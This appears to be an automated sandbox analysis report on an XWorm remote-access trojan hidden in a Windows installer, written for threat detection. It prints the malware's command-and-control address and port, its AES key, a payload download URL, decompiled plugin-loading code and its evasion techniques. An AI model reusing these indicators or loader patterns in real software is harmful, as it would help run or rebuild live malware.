Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
103-o_Installer.exe

Overview

General Information

Sample name:103-o_Installer.exe
Analysis ID:1466308
MD5:dc4b9be7a5645d5c7fd18a4ac175830c
SHA1:3b2a0dc310a1af35629fca61ae1ccc530b8c9a30
SHA256:233e15fe06e10eb85efdd62345a90c62d43d30f2d01122d79fbc5299c25f3d81
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 103-o_Installer.exe (PID: 5508 cmdline: "C:\Users\user\Desktop\103-o_Installer.exe" MD5: DC4B9BE7A5645D5C7FD18A4AC175830C)
  • cleanup
{"C2 url": ["59.56.110.103"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x124f8:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\103[1].ccpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
C:\Users\Public\Downloads\ind.codWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
SourceRuleDescriptionAuthorStrings
00000000.00000002.3671240808.0000000002ED0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x6af2:$cnc4: POST / HTTP/1.1
    00000000.00000002.3671692196.0000000003141000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      Process Memory Space: 103-o_Installer.exe PID: 5508JoeSecurity_XWormYara detected XWormJoe Security
        SourceRuleDescriptionAuthorStrings
        0.2.103-o_Installer.exe.5390000.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
          0.2.103-o_Installer.exe.5390000.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x4e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x4f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x5032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x4cf2:$cnc4: POST / HTTP/1.1
          0.2.103-o_Installer.exe.5390000.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.2.103-o_Installer.exe.5390000.1.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x6af2:$cnc4: POST / HTTP/1.1
            No Sigma rule has matched
            Timestamp:07/02/24-19:25:10.860430
            SID:2852870
            Source Port:7000
            Destination Port:49701
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:21:24.908027
            SID:2855924
            Source Port:49701
            Destination Port:7000
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:25:10.861342
            SID:2852923
            Source Port:49701
            Destination Port:7000
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:23:11.014576
            SID:2853193
            Source Port:49701
            Destination Port:7000
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:24:48.480603
            SID:2852874
            Source Port:7000
            Destination Port:49701
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000000.00000002.3671692196.0000000003141000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["59.56.110.103"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
            Source: 103-o_Installer.exeReversingLabs: Detection: 26%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 103-o_Installer.exeJoe Sandbox ML: detected
            Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpackString decryptor: 59.56.110.103
            Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpackString decryptor: 7000
            Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpackString decryptor: <123456789>
            Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpackString decryptor: <Xwormmm>
            Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpackString decryptor: XWorm V5.6
            Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpackString decryptor: USB.exe
            Source: 103-o_Installer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 103-o_Installer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 59.56.110.103:7000 -> 192.168.2.7:49701
            Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 59.56.110.103:7000 -> 192.168.2.7:49701
            Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.7:49701 -> 59.56.110.103:7000
            Source: TrafficSnort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.7:49701 -> 59.56.110.103:7000
            Source: TrafficSnort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.7:49701 -> 59.56.110.103:7000
            Source: Malware configuration extractorURLs: 59.56.110.103
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 881
            Source: unknownNetwork traffic detected: HTTP traffic on port 881 -> 49700
            Source: global trafficTCP traffic: 192.168.2.7:49700 -> 91.208.240.157:881
            Source: global trafficTCP traffic: 192.168.2.7:49701 -> 59.56.110.103:7000
            Source: Joe Sandbox ViewASN Name: CHINATELECOM-FUJIAN-FUZHOU-IDC1FuzhouCN CHINATELECOM-FUJIAN-FUZHOU-IDC1FuzhouCN
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003A25C8 __EH_prolog,InternetReadFile,0_2_003A25C8
            Source: global trafficHTTP traffic detected: GET /103.ccp HTTP/1.1User-Agent: DownloadHost: guanlix.cn:881Cache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: guanlix.cn
            Source: 103-o_Installer.exeString found in binary or memory: http://guanlix.cn:881/103.ccp
            Source: 103-o_Installer.exe, 00000000.00000002.3670052787.000000000093C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://guanlix.cn:881/103.ccph
            Source: 103-o_Installer.exe, 00000000.00000002.3671692196.0000000003141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

            barindex
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 0.2.103-o_Installer.exe.5390000.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.3671240808.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\103[1].ccp, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\Public\Downloads\ind.cod, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003B007E0_2_003B007E
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003B5A2A0_2_003B5A2A
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003B738F0_2_003B738F
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003AFBE90_2_003AFBE9
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003B0BD60_2_003B0BD6
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003B041C0_2_003B041C
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003B54D90_2_003B54D9
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003B66570_2_003B6657
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003B5F7B0_2_003B5F7B
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003B7F4F0_2_003B7F4F
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003B07EE0_2_003B07EE
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_053A55D80_2_053A55D8
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_053AA2900_2_053AA290
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_053A4D080_2_053A4D08
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_053AAFD00_2_053AAFD0
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_053AE9180_2_053AE918
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_053A07A00_2_053A07A0
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_053A49C00_2_053A49C0
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: String function: 003AA9B0 appears 45 times
            Source: 103-o_Installer.exe, 00000000.00000000.1226802743.00000000003C3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewindos.exe. vs 103-o_Installer.exe
            Source: 103-o_Installer.exe, 00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs 103-o_Installer.exe
            Source: 103-o_Installer.exeBinary or memory string: OriginalFilenamewindos.exe. vs 103-o_Installer.exe
            Source: 103-o_Installer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 0.2.103-o_Installer.exe.5390000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.3671240808.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000000.00000002.3672250082.0000000005390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\103[1].ccp, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: C:\Users\Public\Downloads\ind.cod, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: classification engineClassification label: mal100.troj.evad.winEXE@1/2@1/2
            Source: C:\Users\user\Desktop\103-o_Installer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\103[1].ccpJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeMutant created: NULL
            Source: C:\Users\user\Desktop\103-o_Installer.exeMutant created: \Sessions\1\BaseNamedObjects\tJeTNPzvlX6aPF3G
            Source: 103-o_Installer.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\103-o_Installer.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 103-o_Installer.exeReversingLabs: Detection: 26%
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: 103-o_Installer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: 103-o_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 103-o_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 103-o_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 103-o_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 103-o_Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 0.2.103-o_Installer.exe.5390000.1.raw.unpack, Messages.cs.Net Code: Memory
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003B40E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_003B40E4
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003A4948 push eax; ret 0_2_003A4966
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003AA9F5 push ecx; ret 0_2_003AAA08
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_003A6649 push ecx; ret 0_2_003A665C
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_053AC0A8 push eax; retf 0301h0_2_053ACC2D
            Source: C:\Users\user\Desktop\103-o_Installer.exeCode function: 0_2_053A6B88 pushad ; ret 0_2_053A6B89

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 881
            Source: unknownNetwork traffic detected: HTTP traffic on port 881 -> 49700
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\103-o_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\103-o_Installer.exeMemory allocated: 2FC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeMemory allocated: 3140000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeMemory allocated: 5140000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeWindow / User API: threadDelayed 7422Jump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeWindow / User API: threadDelayed 2418Jump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exe TID: 5640Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exe TID: 1000Thread sleep count: 7422 > 30Jump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exe TID: 1000Thread sleep count: 2418 > 30Jump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\103-o_Installer.exeThread delayed: delay time: 922337203685477Jump to behavior
